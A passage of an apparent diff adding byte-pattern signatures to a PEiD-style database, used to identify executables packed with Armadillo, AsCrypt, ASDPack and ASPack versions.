+signature = 31 2E 31 2E 34 00 00 00 C2 E0 94 BE 93 FC DE C6 B6 24 83 F7 D2 A4 92 77 40 27 CF EB D8 6F 50 B4 B5 29 24 FA 45 08 04 52 D5 1B D2 8C 8A 1E 6E FF 8C 5F 42 89 F1 83 B1 27 C5 69 57 FC 55 0A DD 44 BE 2A 02 97 6B 65 15 AA 31 E9 28 7D 49 1B DF B5 5D 08 A8 BA A8
+ep_only = false
+
+[Armadillo 5.0 Dll -> Silicon Realms Toolworks]
+signature = 83 7C 24 08 01 75 05 E8 DE 4B 00 00 FF 74 24 04 8B 4C 24 10 8B 54 24 0C E8 ED FE FF FF 59 C2 0C 00 6A 0C 68 ?? ?? ?? ?? E8 E5 24 00 00 8B 4D 08 33 FF 3B CF 76 2E 6A E0 58 33 D2 F7 F1 3B 45 0C 1B C0 40 75 1F E8 8F 15 00 00 C7 00 0C 00 00 00 57 57 57 57 57 E8 20 15 00 00 83 C4 14 33 C0 E9 D5 00 00 00 0F AF 4D 0C 8B F1 89 75 08 3B F7 75 03 33 F6 46 33 DB 89 5D E4 83 FE E0 77 69 83 3D ?? ?? ?? ?? 03 75 4B 83 C6 0F 83 E6 F0 89 75 0C 8B 45 08 3B 05 ?? ?? ?? ?? 77 37 6A 04 E8 D7 23 00 00 59 89 7D FC FF 75 08 E8 EC 53 00 00 59 89 45 E4 C7 45 FC FE FF FF FF E8 5F 00 00 00 8B 5D E4 3B DF 74 11 FF 75 08 57 53 E8 2B C5 FF FF 83 C4 0C 3B DF 75 61 56 6A 08 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 3B DF 75 4C 39 3D ?? ?? ?? ?? 74 33 56 E8 19 ED FF FF 59 85 C0 0F 85 72 FF FF FF 8B 45 10 3B C7 0F 84 50 FF FF FF C7 00 0C 00 00 00 E9 45 FF FF FF 33 FF 8B 75 0C 6A 04 E8 7D 22 00 00 59 C3
+ep_only = true
+
+[Armadillo 5.00 -> Silicon Realms Toolworks]
+signature = E8 E3 40 00 00 E9 16 FE FF FF 6A 0C 68 ?? ?? ?? ?? E8 44 15 00 00 8B 4D 08 33 FF 3B CF 76 2E 6A E0 58 33 D2 F7 F1 3B 45 0C 1B C0 40 75 1F E8 36 13 00 00 C7 00 0C 00 00 00 57 57 57 57 57 E8 C7 12 00 00 83 C4 14 33 C0 E9 D5 00 00 00 0F AF 4D 0C 8B F1 89 75 08 3B F7 75 03 33 F6 46 33 DB 89 5D E4 83 FE E0 77 69 83 3D ?? ?? ?? ?? 03 75 4B 83 C6 0F 83 E6 F0 89 75 0C 8B 45 08 3B 05 ?? ?? ?? ?? 77 37 6A 04 E8 48 11 00 00 59 89 7D FC FF 75 08 E8 01 49 00 00 59 89 45 E4 C7 45 FC FE FF FF FF E8 5F 00 00 00 8B 5D E4 3B DF 74 11 FF 75 08 57 53 E8 66 D3 FF FF 83 C4 0C 3B DF 75 61 56 6A 08 FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 3B DF 75 4C 39 3D ?? ?? ?? ?? 74 33 56 E8 AF F9 FF FF 59 85 C0 0F 85 72 FF FF FF 8B 45 10 3B C7 0F 84 50 FF FF FF C7 00 0C 00 00 00 E9 45 FF FF FF 33 FF 8B 75 0C 6A 04 E8 EE 0F 00 00 59 C3
+ep_only = true
+
+[Armadillo v1.60a]
+signature = 55 8B EC 6A FF 68 98 71 40 00 68 48 2D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.71]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1
+ep_only = true
+
+[Armadillo v1.72 - v1.73]
+signature = 55 8B EC 6A FF 68 E8 C1 ?? ?? 68 F4 86 ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58
+ep_only = true
+
+[Armadillo v1.77]
+signature = 55 8B EC 6A FF 68 B0 71 40 00 68 6C 37 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.80]
+signature = 55 8B EC 6A FF 68 E8 C1 00 00 68 F4 86 00 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.82]
+signature = 55 8B EC 6A FF 68 E0 C1 40 00 68 74 81 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.83]
+signature = 55 8B EC 6A FF 68 E0 C1 40 00 68 64 84 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.84]
+signature = 55 8B EC 6A FF 68 E8 C1 40 00 68 F4 86 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90]
+signature = 55 8B EC 6A FF 68 10 F2 40 00 68 64 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90a]
+signature = 55 8B EC 64 FF 68 10 F2 40 00 68 14 9B 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b1]
+signature = 55 8B EC 6A FF 68 E0 C1 40 00 68 04 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b2]
+signature = 55 8B EC 6A FF 68 F0 C1 40 00 68 A4 89 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b3]
+signature = 55 8B EC 6A FF 68 08 E2 40 00 68 94 95 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90b4]
+signature = 55 8B EC 6A FF 68 08 E2 40 00 68 B4 96 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.90c]
+signature = 55 8B EC 6A FF 68 10 F2 40 00 68 74 9D 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v1.9x]
+signature = 55 8B EC 6A FF 68 98 ?? ?? ?? 68 10 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v1.xx - v2.xx]
+signature = 55 8B EC 53 8B 5D 08 56 8B 75 0C 57 8B 7D 10 85 F6
+ep_only = true
+
+[Armadillo v2.00]
+signature = 55 8B EC 6A FF 68 00 02 41 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.00b2-2.00b3]
+signature = 55 8B EC 6A FF 68 00 F2 40 00 68 C4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.01]
+signature = 55 8B EC 6A FF 68 08 02 41 00 68 04 9A 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.10b2]
+signature = 55 8B EC 6A FF 68 18 12 41 00 68 24 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.20]
+signature = 55 8B EC 6A FF 68 10 12 41 00 68 F4 A0 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.20b1]
+signature = 55 8B EC 6A FF 68 30 12 41 00 68 A4 A5 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58
+ep_only = true
+
+[Armadillo v2.50]
+signature = 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0
+ep_only = true
+
+[Armadillo v2.50b3]
+signature = 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 F8 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20 ?? ?? ?? 33 D2 8A D4 89 15 D0
+ep_only = true
+
+[Armadillo v2.51]
+signature = 55 8B EC 6A FF 68 B8 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 20
+ep_only = true
+
+[Armadillo v2.52]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? E0 ?? ?? ?? ?? 68 D4 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 38
+ep_only = true
+
+[Armadillo v2.52]
+signature = 55 8B EC 6A FF 68 E0 ?? ?? ?? 68 D4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 38
+ep_only = true
+
+[Armadillo v2.52 beta2]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? B0 ?? ?? ?? ?? 68 60 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 24
+ep_only = true
+
+[Armadillo v2.52b2]
+signature = 55 8B EC 6A FF 68 B0 ?? ?? ?? 68 60 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 24
+ep_only = true
+
+[Armadillo v2.53]
+signature = 55 8B EC 6A FF 68 40 ?? ?? ?? 68 54 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC
+ep_only = true
+
+[Armadillo v2.53]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 40 ?? ?? ?? ?? 68 54 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF ?? ?? ?? 15 58 33 D2 8A D4 89
+ep_only = true
+
+[Armadillo v2.53b3]
+signature = 55 8B EC 6A FF 68 D8 ?? ?? ?? 68 14 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15
+ep_only = true
+
+[Armadillo v2.5x - v2.6x]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 EC
+ep_only = true
+
+[Armadillo v2.60]
+signature = 55 8B EC 6A FF 68 D0 ?? ?? ?? 68 34 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 68 ?? ?? ?? 33 D2 8A D4 89 15 84
+ep_only = true
+
+[Armadillo v2.60a]
+signature = 55 8B EC 6A FF 68 ?? ?? ?? ?? 68 94 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 B4
+ep_only = true
+
+[Armadillo v2.60b1]
+signature = 55 8B EC 6A FF 68 50 ?? ?? ?? 68 74 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 58 ?? ?? ?? 33 D2 8A D4 89 15 FC
+ep_only = true
+
+[Armadillo v2.60b2]
+signature = 55 8B EC 6A FF 68 90 ?? ?? ?? 68 24 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 60 ?? ?? ?? 33 D2 8A D4 89 15 3C
+ep_only = true
+
+[Armadillo v2.60c]
+signature = 55 8B EC 6A FF 68 40 ?? ?? ?? 68 F4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 F4
+ep_only = true
+
+[Armadillo v2.61]
+signature = 55 8B EC 6A FF 68 28 ?? ?? ?? 68 E4 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 6C ?? ?? ?? 33 D2 8A D4 89 15 0C
+ep_only = true
+
+[Armadillo v2.65b1]
+signature = 55 8B EC 6A FF 68 38 ?? ?? ?? 68 40 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 F4
+ep_only = true
+
+[Armadillo v2.75a]
+signature = 55 8B EC 6A FF 68 68 ?? ?? ?? 68 D0 ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24
+ep_only = true
+
+[Armadillo v2.85]
+signature = 55 8B EC 6A FF 68 68 ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 83 EC 58 53 56 57 89 65 E8 FF 15 28 ?? ?? ?? 33 D2 8A D4 89 15 24
+ep_only = true
+
+[Armadillo v2.xx (CopyMem II)]
+signature = 6A ?? 8B B5 ?? ?? ?? ?? C1 E6 04 8B 85 ?? ?? ?? ?? 25 07 ?? ?? 80 79 05 48 83 C8 F8 40 33 C9 8A 88 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 81 E2 07 ?? ?? 80 79 05 4A 83 CA F8 42 33 C0 8A 82
+ep_only = true
+
+[Armadillo v3.00]
+signature = 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 60 33 C9
+ep_only = true
+
+[Armadillo v3.00a]
+signature = 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB
+ep_only = true
+
+[Armadillo v3.01, v3.05]
+signature = 60 E8 00 00 00 00 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58 50 51 EB 0F
+ep_only = true
+
+[Armadillo v3.10]
+signature = 55 8B EC 6A FF 68 E0 97 44 00 68 20 C0 42 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 4C 41 44 00 33 D2 8A D4 89 15 90 A1 44 00 8B C8 81 E1 FF 00 00 00 89 0D 8C A1 44 00 C1 E1 08 03 CA 89 0D 88 A1 44 00 C1 E8 10 A3 84 A1
+ep_only = true
+
+[Armadillo v3.xx]
+signature = 60 E8 ?? ?? ?? ?? 5D 50 51 EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 59 58
+ep_only = true
+
+[Armadillo v4.00.0053 -> Silicon Realms Toolworks]
+signature = 55 8B EC 6A FF 68 20 8B 4B 00 68 80 E4 48 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4B 00 33 D2 8A D4 89 15 A4 A1 4B 00 8B C8 81 E1 FF 00 00 00 89 0D A0 A1 4B 00 C1 E1 08 03 CA 89 0D 9C A1 4B 00 C1 E8 10 A3 98 A1
+ep_only = true
+
+[Armadillo v4.10 -> Silicon Realms Toolworks]
+signature = 55 8B EC 6A FF 68 F8 8E 4C 00 68 D0 EA 49 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4C 00 33 D2 8A D4 89 15 7C A5 4C 00 8B C8 81 E1 FF 00 00 00 89 0D 78 A5 4C 00 C1 E1 08 03 CA 89 0D 74 A5 4C 00 C1 E8 10 A3 70 A5
+ep_only = true
+
+[Armadillo v4.20 -> Silicon Realms Toolworks]
+signature = 55 8B EC 6A FF 68 F8 8E 4C 00 68 F0 EA 49 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 31 4C 00 33 D2 8A D4 89 15 84 A5 4C 00 8B C8 81 E1 FF 00 00 00 89 0D 80 A5 4C 00 C1 E1 08 03 CA 89 0D 7C A5 4C 00 C1 E8 10 A3 78 A5
+ep_only = true
+
+[Armadillo v4.30 - v4.40 -> Silicon Realms Toolworks]
+signature = 55 8B EC 6A FF 68 40 ?? ?? 00 68 80 ?? ?? 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 53 56 57 89 65 E8 FF 15 88 ?? ?? 00 33 D2 8A D4 89 15 30 ?? ?? 00 8B C8 81 E1 FF 00 00 00 89 0D 2C ?? ?? 00 C1 E1 08 03 CA 89 0D 28 ?? ?? 00 C1 E8 10 A3 24
+ep_only = true
+
+[Armadillo v4.30 - v4.40 -> Silicon Realms Toolworks]
+signature = 60 E8 00 00 00 00 5D 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08 FD EB 0B F2 EB F5 EB F6 F2 EB 08 FD EB E9 F3 EB E4 FC E9 9D 0F C9 8B CA F7 D1 59 58 50 51 0F CA F7 D2 9C F7 D2 0F CA EB 0F B9 EB 0F B8 EB 07 B9 EB 0F 90 EB 08
+ep_only = true
+
+[AsCrypt v0.1 -> SToRM - #1]
+signature = 81 ?? ?? ?? ?? ?? ?? 83 ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? E2 ?? EB
+ep_only = false
+
+[AsCrypt v0.1 -> SToRM - #2]
+signature = 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 83 ?? ?? E2
+ep_only = false
+
+[AsCrypt v0.1 -> SToRM - #3]
+signature = 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 51 ?? ?? ?? 01 00 00 00 83 ?? ?? E2
+ep_only = false
+
+[AsCrypt v0.1 -> SToRM - #4]
+signature = 80 ?? ?? ?? 83 ?? ?? ?? ?? 90 90 90 E2
+ep_only = false
+
+[AsCrypt v0.1 -> SToRM - #5]
+signature = 83 ?? ?? E2 ?? ?? E2 ?? FF
+ep_only = false
+
+[ASDPack 2.0 -> asd]
+signature = 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 4B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 8D 49 00 1F 01 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 90
+ep_only = false
+
+[ASDPack 2.0 -> asd]
+signature = 5B 43 83 7B 74 00 0F 84 08 00 00 00 89 43 14 E9
+ep_only = false
+
+[ASDPack 2.0 -> asd]
+signature = 8B 44 24 04 56 57 53 E8 CD 01 00 00 C3 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00
+ep_only = true
+
+[ASDPack v1.0 -> asd]
+signature = 55 8B EC 56 53 E8 5C 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 ?? ?? ?? 00 00 00 00 00 00 00 40 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 ?? ?? 00 00 10 00 00 00 ?? 00 00 00 ?? ?? 00 00 ?? ?? 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 ?? 00 00 00 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5B 81 EB E6 1D 40 00 83 7D 0C 01 75 11 55 E8 4F 01 00 00 E8 6A 01 00 00 5D E8 2C 00 00 00 8B B3 1A 1E 40 00 03 B3 FA 1D 40 00 8B 76 0C AD 0B C0 74 0D FF 75 10 FF 75 0C FF 75 08 FF D0 EB EE B8 01 00 00 00 5B 5E C9 C2 0C 00 55 6A 00 FF 93 20 21 40 00 89 83 FA 1D 40 00 6A 40 68 00 10 00 00 FF B3 02 1E 40 00 6A 00 FF 93 2C 21 40 00 89 83 06 1E 40 00 8B 83 F2 1D 40 00 03 83 FA 1D 40 00 50 FF B3 06 1E 40 00 50 E8 6D 01 00 00 5F
+ep_only = false
+
+[ASPack v1.00b -> Alexey Solodovnikov]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44
+ep_only = true
+
+[ASPack v1.01b -> Alexey Solodovnikov]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED D2 2A 44 ?? B8 CC 2A 44 ?? 03 C5 2B 85 A5 2E 44 ?? 89 85 B1 2E 44 ?? 80 BD 9C 2E 44
+ep_only = true
+
+[ASPack v1.02a -> Alexey Solodovnikov]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF
+ep_only = true
+
+[ASPack v1.02b -> Alexey Solodovnikov]
+signature = 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5
+ep_only = true
+
+[ASPack v1.02b -> Alexey Solodovnikov]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 C5 2B 85 7D 7C 43 ?? 89 85 89 7C 43 ?? 80 BD 74 7C 43
+ep_only = true
+
+[ASPack v1.03b -> Alexey Solodovnikov]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED AE 98 43 ?? B8 A8 98 43 ?? 03 C5 2B 85 18 9D 43 ?? 89 85 24 9D 43 ?? 80 BD 0E 9D 43
+ep_only = true
+
+[ASPack v1.04b -> Alexey Solodovnikov]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D
+ep_only = true
+
+[ASPack v1.05b -> Alexey Solodovnikov]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44
+ep_only = true
+
+[ASPack v1.061b -> Alexey Solodovnikov]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43
+ep_only = true
+
+[ASPack v1.07b (DLL) -> Alexey Solodovnikov]
+signature = 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5
+ep_only = true
+
+[ASPack v1.07b -> Alexey Solodovnikov]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE
+ep_only = true
+
+[ASPack v1.08.01 -> Alexey Solodovnikov]
+signature = 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D
+ep_only = true
+
+[ASPack v1.08.01 -> Alexey Solodovnikov]
+signature = 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 ?? BB 10 ?? 44 ?? 03 DD 2B 9D
+ep_only = true
+
+[ASPack v1.08.01 -> Alexey Solodovnikov]
+signature = 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9
+ep_only = true
+
+[ASPack v1.08.02 -> Alexey Solodovnikov]
+signature = 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72
+ep_only = true
+
+[ASPack v1.08.03 -> Alexey Solodovnikov]
+signature = 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD
+ep_only = true
+
+[ASPack v1.08.03 -> Alexey Solodovnikov]
+signature = 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E
+ep_only = true
+
+[ASPack v1.08.03 -> Alexey Solodovnikov]
+signature = 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD
+ep_only = true
+
+[ASPack v1.08.03 -> Alexey Solodovnikov]
+signature = 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? BB ?? ?? ?? ?? 03 DD 2B 9D B1 50 44 00 83 BD AC 50 44 00 00 89 9D BB 4E
+ep_only = true
+
+[ASPack v1.08.04 -> Alexey Solodovnikov]
+signature = 60 E8 41 06 00 00 EB 41
+ep_only = true
+
+[ASPack v1.08.x -> Alexey Solodovnikov]
+signature = 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A
+ep_only = true
+
+[ASPack v2.000 -> Alexey Solodovnikov]
+signature = 60 E8 70 05 00 00 EB 4C
+ep_only = true
+
+[ASPack v2.001 -> Alexey Solodovnikov]
+signature = 60 E8 72 05 00 00 EB 4C
+ep_only = true
+
+[ASPack v2.1 -> Alexey Solodovnikov]
+signature = 60 E8 72 05 00 00 EB 33 87 DB 90 00
+ep_only = true
+
+[ASPack v2.11b -> Alexey Solodovnikov]
+signature = 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00
+ep_only = true
+
+[ASPack v2.11c -> Alexey Solodovnikov]
+signature = 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00
+ep_only = true
+
+[ASPack v2.11d -> Alexey Solodovnikov]
+signature = 60 E8 02 00 00 00 EB 09 5D 55
+ep_only = true
+
+[ASPack v2.12 -> Alexey Solodovnikov]
+signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01
+ep_only = true
+
+[ASPack v2.12 -> Alexey Solodovnikov]
+signature = 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB
+ep_only = true
+
+[ASPack v2.xx -> Alexey Solodovnikov]
+signature = A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95
+ep_only = true
+
+[ASPack v2.xx -> Alexey Solodovnikov]
+signature = A8 03 ?? ?? 61 75 08 B8 01 ?? ?? ?? C2 0C ?? 68 ?? ?? ?? ?? C3 8B 85 26 04 ?? ?? 8D 8D 3B 04 ?? ?? 51 50 FF 95
+ep_only = true
+
+[ASPR Stripper v2.x unpacked]
